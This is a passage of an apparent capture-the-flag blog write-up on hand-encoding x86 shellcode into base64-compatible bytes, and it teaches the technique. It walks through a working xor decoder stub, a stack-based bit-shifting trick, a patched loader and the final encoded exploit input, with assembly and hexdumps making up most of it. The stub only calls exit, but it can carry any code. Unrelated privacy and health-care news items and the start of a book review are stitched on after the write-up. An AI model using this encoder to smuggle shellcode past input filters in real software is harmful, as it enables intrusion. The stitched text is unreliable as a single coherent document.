  • Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
  • For each 32-bit pair in the encoded shellcode...
    • Load the other half of the xor pair into edx
    • Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
    • Increment ecx to point at the next value
    • Repeat for the full payload
  • Run the newly decoded payload

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.

Here's the code:

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAA'

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){
     exit(0);
   }

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
[...]
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-db 'AAAAAAAAAAAAAAAAA'
+db 'AAAAAAAAAAAAAAAA', 0xcc

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing is our padding.)

The decoder stub and encoded shellcode can be quite easily generated programmatically rather than doing it by hand, which is extremely error prone (it took me 4 tries to get it right - I messed up the start address, I compiled run_raw_code in 64-bit mode, and I got the endianness backwards before I finally got it right, which doesn't sound so bad, except that I had to go back and re-write part of this section and re-run most of the commands to get the proper output each time :) ).

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

Using those values and our old push / pop / xor pattern, we can set edx to 0x80:

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

That works out to:

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ecx+0x41], edx

This sets the MSB of whatever ecx+0x41 (our current instruction) is.

If we were decoding a single bit at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not <em>really</em> necessary, but it's nice to do it
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

And the fourth:

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |......AAAA..|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |......AAAA..|

If you xor those two strings together, you'll get the original string back.

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

  • 38 01 00 00 -> 0x00000138
  • 00 3b 41 41 -> 0x41413b00
  • 41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

  • 80 00 00 00 -> 0x00000080
  • 00 80 00 00 -> 0x00008000
  • 00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free vale, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAA'

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base 64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want.

Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end so that if anything gets messed up by being a partial block, they will.

Here's the full "exploit", assembled:

hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv
00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

echo -ne 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | xxd -g1 file | cut -b10-57 | tr -d '\n' | sed 's/ /\\x/g'
\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00

And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=) = 340
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

  • Pad the input to a multiple of 4 bytes
  • Break the input up into 4-byte blocks, and find an xor pair that generates each value
  • Set ecx to a value that's 0x41 bits before the encoded payload, which is half of the xor pairs
  • Put the other half the xor pair in-line, loaded into edx and xor'd with the encoded payload
  • If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor
  • After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
  • End with the encoded stub (second half of the xor pairs)

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.

It's complex, but hopefully this blog helps explain it!

South Korea Joins the APEC Cross-Border Privacy Rules System

On Monday, June 12, 2017, South Korea’s Ministry of the Interior and the Korea Communications Commission announced that South Korea has secured approval to participate in the APEC Cross-Border Privacy Rules (“CBPR”) system. South Korea had submitted its intent to join the CBPR system back in January 2017. South Korea will become the fifth APEC economy to join the CBPR system. The other four participants are Canada, Japan, Mexico and the United States.

The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Although all APEC economies have endorsed the system, in order to participate individual APEC economies must officially express their intent to join and satisfy certain requirements.

OCR and Health Care Industry Cybersecurity Task Force Publish Cybersecurity Materials

The U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) and the Health Care Industry Cybersecurity Task Force (the “Task Force”) have published important materials addressing cybersecurity in the health care industry.

The OCR checklist, entitled “My entity just experienced a cyber-attack! What do we do now?,” lists key steps that an organization must undertake in the event of a cyber attack. These steps include:

  • executing response and mitigation procedures and contingency plans by immediately fixing technical and other problems to stop a cybersecurity incident, and taking steps to mitigate any impermissible disclosure of protected health information (“PHI”);
  • reporting the crime to law enforcement agencies, which may include state or local law enforcement, the Federal Bureau of Investigation or the Secret Service;
  • reporting all cyber threat indicators to federal and information-sharing and analysis organizations (“ISAOs”), including the Department of Homeland Security, the HHS Assistant Secretary for Preparedness and Response, and private-sector cyber threat ISAOs; and
  • notifying OCR of the breach as soon as possible, but no later than 60 days after the discovery of a breach affecting 500 or more individuals.

The checklist is accompanied by an infographic that lists these steps and notes that an organization must retain all documentation related to the risk assessment following a cyber attack, including any determination that a breach of PHI has not occurred.

The Task Force, which was established in 2015 by Congress, is composed of government officials and leaders in the health care industry. The Task Force’s report notes that “health care cybersecurity is a key public health concern that needs immediate and aggressive attention” and identifies six key imperatives for the health care industry. These imperatives are:

  • defining and streamlining leadership, governance and expectations for health care industry cybersecurity;
  • increasing the security and resilience of medical devices and health information technology;
  • developing the health care workforce capacity necessary to prioritize and ensure cybersecurity awareness and technical capabilities;
  • increasing health care industry readiness through improved cybersecurity awareness and education;
  • identifying mechanisms to protect research and development efforts and intellectual property from attacks or exposure; and
  • improving information sharing of industry threats, risks and mitigations.

The report lists recommendations and action items under each of these six imperatives. These include (1) evaluating options to migrate patient records and legacy systems to secure environments (e.g., hosted, cloud, shared computer environments), (2) developing executive education programs targeting executives and boards of directors about the importance of cybersecurity education, and (3) requiring strong authentication to improve identity and access management for health care workers, patients, medical devices and electronic health records.

The report concludes by providing a list of key resources and best practices for addressing cybersecurity threats that were gleaned from studying the financial services and energy sectors.

The publication of these cybersecurity materials follows in the wake of several notable cyberattacks, including the WannaCry ransomware attack that affected thousands of organizations in the health care industry.

Book review: The Car Hacker’s Handbook

So, this is going to be a bit of an unusual blog for me. I usually focus on technical stuff, exploitation, hacking, etc. But this post will be a mixture of a book review, some discussion on my security review process, and whatever asides fall out of my keyboard when I hit it for long enough. But, don't fear! I have a nice heavy technical blog ready to go for tomorrow!

Introduction

Let's kick this off with some pointless backstory! Skip to the next <h1> heading if you don't care how this blog post came about. :)

